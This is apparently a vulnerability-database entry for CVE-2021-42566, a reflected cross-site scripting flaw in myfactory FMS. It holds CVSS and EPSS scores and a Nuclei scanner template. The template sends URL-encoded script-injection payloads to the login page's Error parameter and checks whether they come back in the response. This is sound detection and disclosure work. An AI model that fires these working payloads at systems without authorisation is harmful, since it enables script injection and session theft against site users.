Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-42566
HistoryOct 27, 2021 - 2:43 p.m.

myfactory FMS - Cross-Site Scripting

2021-10-2714:43:56
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.2%

myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.

id: CVE-2021-42566

info:
  name: myfactory FMS  -  Cross-Site Scripting
  author: madrobot
  severity: medium
  description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42566
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
    - https://www.redteam-pentesting.de/advisories/rt-sa-2021-001
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-42566
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43259
    cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: myfactory
    product: fms
  tags: cve2021,cve,myfactory,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100baa5a1f43f51829cac1ea016698d3e5dd9d309eef79e75c77b4bde8098b936cf022100f498c819ae81592210ea03d79e7ca430baefb317d61057da41e5300bc41575ac:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.2%

Related for NUCLEI:CVE-2021-42566